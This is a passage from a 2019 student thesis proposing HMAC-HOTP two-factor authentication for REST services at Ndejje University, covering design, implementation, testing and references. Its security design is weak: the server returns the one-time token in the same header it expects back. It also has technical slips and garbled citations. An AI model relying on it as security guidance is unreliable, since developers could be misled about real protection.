RESTful web services for Ndejje University should be able to execute a number of tasks however a few a listed below since the main focus of the study is security and authentication.

4.6.1 Interoperability

The web service should facilitate inter-operation of the different system irrespective of the Environment and programming languages as specified by (Austin, et al., 2014). This is to enable integration of all University systems and facilitation of data sharing among the system without changing the underlying applications.

4.6.2 Registrations and Adding of Users (Students, staff)

The Systems at Ndejje are based on digest authentication therefore one needs to be registered on the system before they can have access to any functionality of the system. Therefore, the service is required to allow user registration to the different system with one central registration point.

4.6.3 System logs and tracking

The service should be able to log users and activities within the different services. This is to help track who and when a certain activity was executed.

4.7 Non Functional Requirements

Correctness of the service was identified as the main non-function. This is the ability of the service to perform as expected following the specifications.

The service is expected to have a high level of performance. This means that the system should have a high response time as well as through-put. Delays in processing requests is not required by the users.

The service should have a high-level of Security, this means it should be able to protect against any threats that might attack the service but also the systems and data for the University.

The service should also be scalable. Since the University expects to purchase more systems and recruit more students and staff, the service is expected to be able to handle the growing demands of the University.

4.8 Implementation Specific Requirements

Implementation specific requirements (ISR) of the service were described but the purposes of this report the study only focused on the ISR for security and authentication mechanism of the service. The security specifics of REST were identified following authentication of applications.

Abbildung in dieser Leseprobe nicht enthalten

Table 1: ISR for REST SECURITY

4.9 Design

4.9.1 Architectural Diagram

Abbildung in dieser Leseprobe nicht enthalten

Figure10:RESTful Web Service Architecture

The RESTful design has three discrete sections of the system: the domain mode, Series of REST endpoints and Means of storing domain objects (Persistence). This is also known as the three Tier Architecture. REST service was built on top an N-tier Architecture that is why it inherits the three levels (Fowler, 2015). The three tiers in this architecture are (1) presentation, (2) domain, and (3) data source (used interchangeably with persistence layer). In our case, our REST endpoints map to the presentation layer, our domain model maps to the domain layer, and our in-memory database maps to the data source layer. Domain objects are not sent directly to the user. Instead, they are wrapped in resources and the resources are provided to the user. This provides a level of indirection between the domain object and how we present the domain object to the user. For example, if we wish to present the user with a different name for a field in our domain model (say getName instead of simply name), we can do so using a resource. Although this level of indirection is very useful in decoupling our presentation from the domain model, it does allow duplication to sneak in. In most cases, the resource will resemble the interface of the domain object, with a few minor additions. This issue was addressed later when we implemented our presentation layer.

4.9.2 Sequence Diagram

The designed authentication mechanism takes shape from the well-known two factor authentication of web applications (Brandom, 2017).

Abbildung in dieser Leseprobe nicht enthalten

Figure 11: Sequence Diagram for Two- Factor Authentication Using HOTP in REST

Two Factor Authentication is an authentication method in which a computer user is granted access only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism: knowledge (something the user and only the user knows), possession (something the user and only the user has), and inherence (something the user and only the user is)(Rosenblatt ,2019; Petrus, 2019). The Authentication has been automated and placed in REST. Since the two systems have to communicate without any human interference, this research provided a mechanism to secure REST services by validating a request two times. The first check is API key (something the client and only the client knows) which acts as the password. This API Key is generated and uniquely assigned to a given client. As a request is made to the service in other words, as URI is sent to a given endpoint of the service, it should come along with an API key that uniquely identifies the client requesting for a given resource. The key is validated based on the decryption mechanism. If it is found to be authentic, then the client will be requested to provide another set of information which was referred to as the access token in this study. The access token is a one-time unique code generated by the service server basing on the HOTP algorithm. If the client is able to produce the access token, then the requested resource will be made available.

Figure 11 (sequence diagram for multi factor authentication) shows a sequence diagram illustrating how six different objects communicate through sending messages to achieve the two factor authentication in REST services.

The user object initiates the process, this is because the systems at Ndejje University only request for data when a user has requested for it from the client interfaces. The user sends a request for data to the client application which then passes on this request to its server application. However, the server has to first authenticate or validate if the request is coming from an authentic user. When the user request is validated, the server initiates a communication with the services. This communication takes form of a three-way hand-shake used in TCP (Conrad, Misenar and Feldman, 2016) where one communication device initiates the communication with syn message and then the other responds with an ack-syn message. Then after first acknowledgement of the ack-syn message, the communication of data is started. In the study, the Server 1 also referred to as client because it consumes the service will start the communication by sending the request. When a request is received by the resource server (REST service server) the server will verify the API key, if the Key is authentic, then the server will respond with an acknowledgement attaching into the header/meta section the access token. The client is expected to study off the access token and send it back to the resource server. The resource server will validate the access token against those tokens generated prior to the received token. If the token is valid then the resource server will request for the resource from the other system here in referred to as server 2. The generation and authentication of the access token is based on the HOTP algorithm as described in figure 12.

Abbildung in dieser Leseprobe nicht enthalten

Figure 12: Token Generator Sequence Diagram

Figure 12 Illustrates how the HOTP access token is generated. The mechanism is comprised of five objects that exchange messages. The client will request for an access token after sending a request with a valid API key as explained and showed in figure 11. To generate an access token, the request handler object will verify the received request and then forward it to the token generator object. The token generator runs the HOTP algorithm and generates the access token then verify that the new token has never been generated by checking in the database using the persistence object. When the generated access token is valid and new, it passed on from the token generator object to the token parser object which then sends it to the client object. The client will be expected to read off the access token from the Meta message sent by the token parser.

4.9.3 Class diagram

Abbildung in dieser Leseprobe nicht enthalten

Figure 13: Class Diagram for Token Generation

Figure 13 shows a class diagram. This was generated following the sequence diagrams that showed the objects. It should be noted that in object oriented analysis, each object is as a result of a class by definition (Barnes and Koolling, 2017). The class diagram shows four classes which represent the four objects used in generating and passing the access token. The main parent class is the HOTP class. This class has the methods that are used to generate the access token which include; a public generate HOTP method that returns a string after taking in a long parameter, a public calculate checksum method that returns also a string and the hmac_shal function that is responsible for masking the access token and it returns a mac type. The HOTPUTIL class is used to validate the generated access token using the method validate that takes in a string and returns a Boolean. This has a many to one cardinality with its parent class HOTP. Request handler and HOTP Parser classes inherit from the HOTP and HOTPUTIL classes with a one to one cardinality

4.9.4 State Diagram

Abbildung in dieser Leseprobe nicht enthalten

Figure 14: State Diagram for Multi-Factor Authentication Mechanism

The REST service can be in four states. These states are illustrated in figure 14. The initial state is after starting the service is the Request Waiting. Here the service is not processing anything but instead waiting for any requests that might come in. When a request is received, the service moves from the request waiting state to Authenticate state were the request is checked if it is valid or not. In case the request is not valid, the service goes back to waiting state, however, if the request is valid the service will process the request in the Handle Request state. If the required resource is not available, the service goes back to waiting state or if all services have been processed then the resources will be delivered and the service can go into Shutdown were no more requests will be handled. It is also noted that irrespective of the state, if a service runs into a bug, it will automatically shut down.

4.10 Implementation

It was noted that the Ndejje University has multiple systems and users. Each system executes a series of activities even though at some point in time these systems will need to synchronize and share data. Therefore, as a proof of concept of our security mechanism, the study assumed two systems integrated using RESTful web services and the data sharing process is secured.

This was developed using Java Spring Boot and JSON for exchanging data. This section details how the HMAC-HOTP can be integrated in REST services to enhance security by introducing a multi-factor authentication. As illustrated in Figure 11, the algorithm was added on top of the existing API key security mechanism thus creating a two-factor authentication in REST.

4.10.1 Implementation of HMAC-HOTP in REST

This algorithm relies on two factors: a shared secret and a moving factor (counter). As part of the algorithm an HMAC SHA1 hash (hash-based message authentication code) of the moving factor was generated using the shared secret. This algorithm is event-based, meaning that whenever a new OTP is generated, the moving factor is incremented; hence the subsequently generated token would be different each time.

Generating an HOTP Value

Abbildung in dieser Leseprobe nicht enthalten

4.10.2 Hashed One Time Password

HOTP (Hashed One Time Password) allows a new unique token to be created each instance, based on a counter value and an initial seed. This means at every URI request, a new hashed token will be generated and passed on to the client to be reproduced in the acknowledgement of a new request.

Abbildung in dieser Leseprobe nicht enthalten

Figure 16:HOTP VIEW

4.10.3 HOTP Validator

The generated token is based on the algorithm and it should be noted that at every generation, a new token is produced. The validator class (HOTPUtil) was used to crosscheck and confirm that the generated token is actually unique before it can be sent back to the client who initiated the request.

Abbildung in dieser Leseprobe nicht enthalten

4.10.4 Token Sharing in REST

The implementation of access token generation, was done using Java Standard Edition, therefore, there is need to pass on the access token via the network. This means encapsulating the access token in the HTTP header such that it can be received by the client who will send it again alongside the Request URI in addition to the API key. The token header below shows how the HTTP header is customized using a predefined function custom. This enabled to append the access token and API key as authentication mechanism TokenHandler or parameters that should come with the requested URI. The token is passed on as JSON type therefore, the service will be expected to handle JSON data type.

Abbildung in dieser Leseprobe nicht enthalten

HttpUriRequest request = RequestBuilder.get().setUri(arms.ndu.ac.ug?api_key and accesstoken).setHeader(HttpHeaders.CONTENT_TYPE, "application/json").build();

Abbildung in dieser Leseprobe nicht enthalten

The Payload illustrates the kind of data that is to be passed on in case of sending access token to the client. The section is made up of mainly three sections that is: iss, exp,sub, and scope.

Iss: is who issued the token.

Exp: is when the token expires.

sub : is the subject of the token. This is usually an application identifier.

Scope is the endpoint from which data can be fetched.

TokenHandler

Abbildung in dieser Leseprobe nicht enthalten

This function is responsible of issuing the access token to the client. The token which is generated by the java class accsssTokenGen is captured and hashed with HS256 key. At this point, the function compact will add the code to the HTTP header illustrated in code list “Token Header”.

4.11 Testing

The service was tested on a local server with the following output was captured.

Abbildung in dieser Leseprobe nicht enthalten

The two-factor authentication that was developed was tested by running a request to the service. The code listing above shows that the request was received by the service and a token was generated and returned to the client who later verified it by attaching the token to the URI, clearly showing how long the token is valid. Therefore, in case the client application did not respond with a new request of attaching the token and API key, it would be considered invalid. This meant that the mechanism was working and needed validation from experts. It should also be noted that the classes developed had a number of methods which were tested using the JUnit testing framework. It showed that all the methods would execute as required since they passed the Assert JUnit test method basing on the test cases that were used during the test process.

The other testing carried-out was Penetration Testing. This focused on ensuring that the implemented security mechanism cannot be broken. Furthermore, penetration testing of the service was carried out. Penetration testing was considered because it would help ensure that no compromise to data privacy, guarantee and secure financial transactions and financial data over the University network. Additionally, it would help discover security vulnerabilities, and loopholes in the APIs in underlying systems, simulate, forecast, understand, and assess impacts due to attacks and threats that might affect the service and the University systems, in order to make APIs as fully information security compliant.

The testing process was executed in three main phases, that is, scanning which only involved the static code analysis with main focus on taint analysis where the variables (Token and API) were analyzed to see that they cannot be modified by users during transmission. The second phase was the gain access. Here, privilege escalation method was used to uncover any injection or cross-site attacks that might affect the proper working of the service. The last phase executed was the maintain access and analysis. Here, the illicit, long-term presence on the network was created to ensure and assess the long-term presence abilities and chances of gaining in-depth access to the APIs and service. The analysis of the test was done and is presented in Table 2 below.

Abbildung in dieser Leseprobe nicht enthalten

Table 2: Penetration Testing Report

4.12 Validation of the Multi-Factor Authentication

The developed mechanism was tested and simulated using Java Spring Boot framework to ensure that there are no bugs within the codes. However, validation was done by external experts in the area of web services and APIs following a validation guide. The results from the validation process are reported in Table 2. The variables considered during the validation included: the route which relates to defining if the right resource to be consumed is exactly what is being fetched, parameter variable looked at if the parameters to consume a resource are really valid and here we had at least more than two parameters to lookout for. Pre-state represents whether the entity in question (client) can be sued, post-status was checking if the session and session variables (entity) remain valid even after the session or action is performed, permission focused on to check if the client can really consume the service.

Route

With use of one of the endpoints, the validators identified that the routes were always determined in all the endpoints of the service. So, it was easy to know which endpoint to consume following the route. This is illustrated in the sample code for update student profile. Since the routes are set then the service is able to provide resources to clients.

Update student Email End point

Abbildung in dieser Leseprobe nicht enthalten

Permission

After certifying that the request is consuming the correct location, the next validation step was to check whether or not the client making the request can consume the endpoint. This was done by verifying of the authentication was working fine and part of the endpoint. This was proved as illustrated in the code studentprofile. It has the annotation of authentication which inherits the API and access token authentication mechanisms implemented in this study.

Abbildung in dieser Leseprobe nicht enthalten

Parameters

At this point we already know that the resource being consumed exists, is correct, and that the client in question has permission to request for it. The next step was to validate whether the request is actually valid, that is, if the client has all the information necessary for an action to be performed. It was proved that parameter check was done well at all endpoints. Sample code is illustrated below:

Abbildung in dieser Leseprobe nicht enthalten

Pre-state step was carried out to ensure that changes cannot occur after a request has been handled. For example, change of student email cannot happen when it has already been done and the session closed. This was done by ensuring that all conditions are set at each endpoint to control changes in the data. Taking the example of an email update, the code shows the conditions set in order to change the email and all these have to be met for the change to be effected by the student profilecontroller .

Abbildung in dieser Leseprobe nicht enthalten

Post-status

In this step, experts were supposed to certify that after all changes are completed the service or resource or entity was still valid. The fact that we can change some profile data, even for valid values, does not mean that the profile will be valid after its changes. To meet this requirement, a self-validation class was created for each endpoint to make sure that checks for the validity of a resource is done after a change. With reference to the studentemail example, this was implemented as shown in the code which was then later called in the student profilecontroller.

Abbildung in dieser Leseprobe nicht enthalten

CHAPTER FIVE:

SUMMARY, CONCLUSION AND RECOMMENDATIONS

5.0 Introduction

This chapter summaries the study carried out in the sub sections of summary, conclusion and recommendations that result from this work thus suggesting future work and implementation.

5.1 Summary of Findings

In this section we summaries how the objectives of the study were fulfilled. The study had four specific objectives that were supposed to be achieved in-order to attain the main objective

To study and review existing literature related to RESTful web services and information security thus identifying loopholes and determining requirements for an improved authentication mechanism in RESTful web services. This was achieved through mainly two methods: Primary data collection were systems users and developers were engaged and interviewed. This enabled the researcher to collect primary data about the University and the underlying systems thus identifying the user requirements of the system to be developed. Secondary data was collected through literature/document review. This helped in identifying technical loopholes in the current systems and in RESTful web services thus facilitating the identification of possible solutions in developing enhanced features. The literature revealed that RESTful web services have loopholes and that they base their authentication on techniques like Open Digest and API key authentication. These mechanisms have been in place and work, however, they are not able to secure the service from threats and attacks like cross-site scripting and injections. Literature revealed that using a two-factor authentication in web application has helped to stop and control such threats. Therefore, the study deemed it right that the use of two factor authentication in REST services would control the threats in REST services.

To design an improved authentication mechanism in web services based on the requirements identified in the literature review and hence coming up blueprints of an improved authentication mechanism for REST: This objective was realized by deploying the object oriented deigns which included class diagrams, sequence diagrams and state diagrams. These design tools were used because they capture all object-oriented features.

To implement the logical designs of an improved secure authentication mechanism of RESTful web services: The designed models after objective two, a secure two-factor authentication mechanism was developed using Java Spring Boot framework where four main classes were developed to generate, verify and pass on the access token as JSON message in the HTTP header. Further, the HTTP protocol header was modified to accommodate the new parameter “Access Token” that was generated using HMAC-HOTP algorithm.

To test and validate if the developed authentication mechanism secures web services and improves the security of RESTful services: This was carried out using JUnit testing where each method in each class was tested to ensure that they generate the expected output and run without errors following all the test cases that were simulated. The testing cases where simulated based on the three JUnit test classes, Assert, testCase and testResult. Having realized that the service and authentication mechanism was working, this had to be rolled out to experts in web service and web application security to validate if the proposed mechanism was fit for purpose. The validation process was guided by the validation guide which was developed by the researcher. Results were collected and compared to the current REST authentication implementations. The comparison showed that a two-factor authentication would work relatively better than a single API key authentication and verification of URIs.

5.2 Conclusion

The study was carried out to identify loopholes in RESTful web services. Security being main factor identified from literature, the study identified a multi-factor authentication commonly used with web application to ensure authentic access to the application. Since the proposed RESTful web service will be intended to integrate systems and applications with other systems, this meant that there is not human intervention when the systems are communicating hence making it hard to implement a multi-factor authentication. Therefore, the study benchmarked the use of API keys and OAuth mechanisms to implement an enhanced multi-factor authentication using HOTP algorithm to generate and verify access token for and from the client application respectively. The proposed mechanism was developed using Java technologies alongside JSON and HTTP. It was further tested and results reported. It showed that the two-factor authentication between applications is hard to implement since it requires modification of the protocol (HTTP) header and sending acknowledgement of the initial request. However, it proved to be more efficient as compared to the single API key authentication since now the request application is further tested if it intended to send the request and whether it is an authentic application.

5.3 Recommendations

The study revealed that a number of institutions are still using traditional system architectures and the few that are trying to migrate to new system architectures are still struggling. Therefore, it is recommended that organizations and institutions migrate from the traditional architectures such as Micro-services, and embrace the new technologies in order to reap from the numerous merits of these technologies. Furthermore, system integration should be taken as key factor in an organization’s information system strategy. System integration ensures interoperability and easy sharing or access to information by the different stakeholders. Additionally, when systems are integrated, organizations may not need to migrate large volumes of sensitive and useful data housed in their legacy systems. Data migration is often a very tedious activity that leads to disruptions to the daily organizational operations. While integrating systems, it is argued that an organization should use the service-oriented architecture as it does not change the underlying application, but rather creates an environment of interoperability and simplicity, especially when the REST architectural style is used.

The developed security mechanism is recommended for organizations that use RESTful web services to integrate systems. It should be noted that mechanism is caters for endpoint security. Therefore, to make it more effective, it is recommended that developed security mechanism is implemented over the transport layer using TLS/SSL to facilitate secure transmission of URI.

5.4 Suggestions for Further Research

Security is an ever growing demand in computing and with the advancement in the usage of the Internet, managing secure applications is key. Therefore, further research is recommended to improve the security of web applications and services. Our study focused on introducing an automated multi-factor authentication to ensure the security of RESTful web services, however, this only guarantees security on the request URI. Future work can be done to ensure security of the response. In case a client requested for data, we need to ensure that the response given to the client application is also authentic. This could be done by reversing the three-way hand-shake mechanism.

References

Amit, Y., Hay, R., Saltzman, R. and Sharabani, A., International Business Machines Corp, 2011. Thwarting cross-site request forgery (csrf) and clickjacking attacks. U.S. Patent Application 12/825,290.

Ao, S. and Gelman, L. (2011). Electronic Engineering and Computing Technology. 90th ed. Taipei: Springer.

Austin, D., Barbir, A., Ferris, C. and Garg, S. (2014). Web Services Architecture Requirements. [online] w3.org. Available at: https://www.w3.org/TR/2004/NOTE-wsa-reqs- 20040211/#id2605016 [Accessed 15 Jun. 2019].

Bengtsson, M., 2016. How to plan and perform a qualitative study using content analysis. NursingPlus Open, 2, pp.8-14.

Bisht, P., Hinrichs, T., Skrupsky, N., Bobrowicz, R. and Venkatakrishnan, V.N., 2010, October. NoTamper: automatic blackbox detection of parameter tampering opportunities in web applications. In Proceedings of the 17th ACM conference on Computer and communications security (pp. 607-618). ACM.

Brandom, R. (2019). Two-factor authentication is a mess. [online] The Verge. Available at: https://www.theverge.com/2017/7/10/15946642/two-factor-authentication-online-security- mess [Accessed 18 Jul. 2019].

Bucchiarone, A., Dragoni, N., Dustdar, S., Larsen, S.T. and Mazzara, M., 2018. From monolithic to micro-services: an experience report from the banking domain. Ieee Software, 35(3), pp.50-55.

Caviglione, L., Coccoli, M. and Merlo, A., 2014. A taxonomy-based model of security and privacy in online social networks. IJCSE, 9(4), pp.325-338.

Cerny, T., Donahoo, M. J. and Pechanec, J. (2017) ‘Disambiguation and Comparison of SOA, Micro-services and Self-Contained Systems’, pp. 228-235. doi: 10.1145/3129676.3129682.

Chen, E.Y., Pei, Y., Chen, S., Tian, Y., Kotcher, R. and Tague, P., 2014, November. Oauth demystified for mobile application developers. In Proceedings of the 2014 ACM SIGSAC conference on computer and communications security (pp. 892-903). ACM.

Conrad, E., Misenar, S. and Feldman, J., 2016. Eleventh Hour CISSP®: Study Guide. Syngress.

Crotty, J. and Horrocks, I., 2017. Managing legacy system costs: A case study of a meta­assessment model to identify solutions in a large financial services company. Applied computing and informatics, 13(2), pp.175-183.

De Backere, F., Hanssens, B., Heynssens, R., Houthooft, R., Zuliani, A., Verstichel, S., Dhoedt, B. and De Turck, F., 2014, May. Design of a security mechanism for RESTful Web Service communication through mobile clients. In 2014 IEEE Network Operations and Management Symposium (NOMS) (pp. 1-6). IEEE.

De, B., 2017. API Management. In API Management (pp. 15-28). Apress, Berkeley, CA.

Dragoni, N., Giallorenzo, S., Lafuente, A.L., Mazzara, M., Montesi, F., Mustafin, R. and Safina, L., 2017. Micro-services: Yesterday, Today, and Tomorrow. Present and Ulterior Software Engineering, p.195.3.4 Data collection methods and instruments

El-Fotouh, M. and Diepold, K. (2008). THE SUBSTITUTION CIPHER CHAINING MODE. In Proceedings of the International Conference on Security and Cryptography, pp.421­429.

Fowler, M. (2015). Patterns of enterprise application architecture. 1st ed. Boston, Mass.: Addison-Wesley.

Fowler, M. (2015). Patterns of enterprise application architecture. 1st ed. Boston, Mass.: Addison-Wesley.

Gorski, P.L., Iacono, L.L., Nguyen, H.V. and Torkian, D.B., 2014, June. Service security revisited. In 2014 IEEE International Conference on Services Computing (pp. 464-471). IEEE.

Gupta, S. and Gupta, B.B., 2017. Cross-Site Scripting (XSS) attacks and defense mechanisms: classification and state-of-the-art. International Journal of System Assurance Engineering and Management, 8(1), pp.512-530.

Habibullah, S., Liu, X. and Tan, Z., 2018. An Approach to Evolving Legacy Enterprise System to Microservice-Based Architecture through Feature-Driven Evolution Rules. International Journal of Computer Theory and Engineering, 10(5).

Halili, F. and Ramadani, E., 2018. Web services: a comparison of soap and rest services. Modern Applied Science, 12(3), p.175.

IBM (n.d.) ‘How IBM leads building hybrid cloud solutions : Implementing the CSCC Customer Cloud Architecture for API Management’, pp. 1-25.

Jamshidi, P., Pahl, C., Mendonça, N.C., Lewis, J. and Tilkov, S., 2018. Micro-services: The journey so far and challenges ahead. IEEE Software, 35(3), pp.24-35.

Jimenez, W., Mammar, A. and Cavalli, A., 2009. Software vulnerabilities, prevention and detection methods: A review1. Security in Model-Driven Architecture, p.6.

Kalske, M., 2017. Transforming monolithic architecture towards microservice architecture. University of Helsinki Press.

Laudon, K. and Laudon, J. (2007). Management information systems: Managing the digital Firm. 10th ed. Prentice Hall.

Lavrakas, P.J., 2008. Encyclopedia of survey research methods. Sage Publications.

Lavrakas, P.J., 2008. Encyclopedia of survey research methods. Sage Publications.

Lee, H., and Mehta, M.R., 2013. Defense Against REST-based Web Service Atacks for Enterprise Systems. Communications of the IIMA: Vol. 13: Iss. 1, Article 5.

Lee, S., Jo, J.Y. and Kim, Y., 2017. Authentication system for stateless RESTful Web service. Journal of Computational Methods in Sciences and Engineering, 17(S1), pp.S21-S34. Leedy, P.D. and Ormrod, J.E., 1993. Practical Research Planning.

Li, W., Mitchell, C.J. and Chen, T., 2019. OAuthGuard: Protecting User Security and Privacy with OAuth 2.0 and OpenID Connect. arXiv preprint arXiv:1901.08960. Li, X. and Xue, Y., 2014. ACM Computing Surveys (CSUR), 46(4), p.54.

Lo Iacono, L., Nguyen, H.V. and Gorski, P.L., 2019. On the Need for a General REST-Security Framework. Future Internet, 11(3), p.56.

Lu, N., Glatz, G. and Peuser, D., 2019. Moving mountains - practical approaches for moving monolithic applications to Micro-services. The International Conference on Micro-services, Dortmund.jectio

Mumbaikar, S. and Padiya, P., 2013. Web services based on soap and rest principles. International Journal of Scientific and Research Publications, 3(5), pp.1-4.

Mumtaz, A. and Hadi, S., 2012. Developing a Three-tier Web Data Management Application for Higher Education Admission Environment. International Arab Journal of e-Technology, Vol.2, No.4. Page 175-180.

Nguyen, H.V., Tolsdorf, J. and Iacono, L.L., 2017, August. On the security expressiveness of REST-based API definition languages. In International Conference on Trust and Privacy in Digital Business (pp. 215-231). Springer, Cham.

Nordbotten, N.A., 2009. XML and web services security standards. IEEE Communications Surveys and Tutorials, 11(3), pp.4-21.

Perforce Software Inc. (2014). Considerations for API Requirements | Akana. [online] Akana.com. Available at: https://www.akana.com/blog/considerations-api-requirements [Accessed 4 Jun. 2019].

Petrus, A. (2019). How to extract data from a 2FA iCloud account. [Online] Iphonebackupextractor.com. Available at: https://www.iphonebackupextractor.com/blog/exThe first generation of the Service-Oriented Architecture (SOA) [Accessed 9 May 2019].

Regoniel, P.A., 2015. Conceptual framework: a step by step guide on how to make one. SimplyEducate. Me.

Rosenblatt, S. 2019. Two-factor authentication: What you need to know (FAQ). [Online] CNET. Available at: https://www.cnet.com/news/two-factor-authentication-what-you-need- to-know-faq/ [Accessed 12 Jun. 2019].

Technopedia.com. 2019. System Requirements. [Online] Available at: https://www.techopedia.com/definition/4371/system-requirements [Accessed 6 Jun. 2019].

Tihomirovs, J. and Grabis, J., 2016. Comparison of soap and rest based web services using software evaluation metrics. Information Technology and Management Science, 19(1), pp.92­97. Cerny, T., Donahoo, M. J. and Pechanec, J. (2017) ‘Disambiguation and Comparison of SOA, Micro-services and Self-Contained Systems’, pp. 228-235. doi: 10.1145/3129676.3129682. IBM (no date) ‘How IBM leads building hybrid cloud solutions : Implementing the CSCC Customer Cloud Architecture for API Management’, pp. 1-25.

Thomas, A. and Gupta, A. (2016) ‘Retire the Three-Tier Application Architecture to Move

Toward Digital Business’, (June). Available at: https://www.gartner.com/binaries/content/assets/events/keywords/applications/apps20i/retire _the_threetier_applica_308298.pdf.

VeriSign, D., Bellare, M., Hoornaert, F., Naccache, D. and Ranen, O. (2005). RFC 4226 - HOTP: An HMAC-Based One-Time Password Algorithm. [Online] Tools.ietf.org. Available at: https://tools.ietf.org/html/rfc4226#section-5 [Accessed 5 Jun. 2019]. Walker, R., 1985. Applied qualitative research. Gower Pub Co.

Appendices

Appendix 1

Abbildung in dieser Leseprobe nicht enthalten

Appendix 2

Abbildung in dieser Leseprobe nicht enthalten

Appendix 3

Abbildung in dieser Leseprobe nicht enthalten

Appendix 4

Abbildung in dieser Leseprobe nicht enthalten

Appendix 5 Standard Error Codes

Abbildung in dieser Leseprobe nicht enthalten

Interview by: Luyima Alex

Questions:

System (Naïve) Users

1. Gender of the respondents
2. What is your role in Ndejje university?
3. Have you worked with any Information Management System within the university?
4. What activities/task did you do with the system
5. Were you able to execute all the tasks?
6. Were you able to access all the required information for the tasks in one system?
7. How do you share data with other users using other systems?
8. What would be your recommendation to improve the current system (Processes)

Technical user (Developers)

1. How best can the system be integrated
2. Why are you recommending that style?
3. What languages would you recommend to implement the proposed method of integration
4. Is security a factor during integration of these systems? Why?

[...]

Final del extracto de 84 páginas

Detalles

Título
Enhancing RESTful Web Service Security with a Multi-Factor Authentication Mechanism
Curso
Information Systems
Calificación
15.0
Autor
Año
2019
Páginas
84
No. de catálogo
V962688
ISBN (Ebook)
9783346317148
ISBN (Libro)
9783346317155
Idioma
Inglés
Palabras clave
enhancing, restful, service, security, multi-factor, authentication, mechanism
Citar trabajo
Alex Luyima Cedric (Autor), 2019, Enhancing RESTful Web Service Security with a Multi-Factor Authentication Mechanism, Múnich, GRIN Verlag, https://www.grin.com/document/962688

Comentarios

  • No hay comentarios todavía.
Leer eBook
Título: Enhancing RESTful Web Service Security with a Multi-Factor Authentication Mechanism



Cargar textos

Sus trabajos académicos / tesis:

- Publicación como eBook y libro impreso
- Honorarios altos para las ventas
- Totalmente gratuito y con ISBN
- Le llevará solo 5 minutos
- Cada trabajo encuentra lectores

Así es como funciona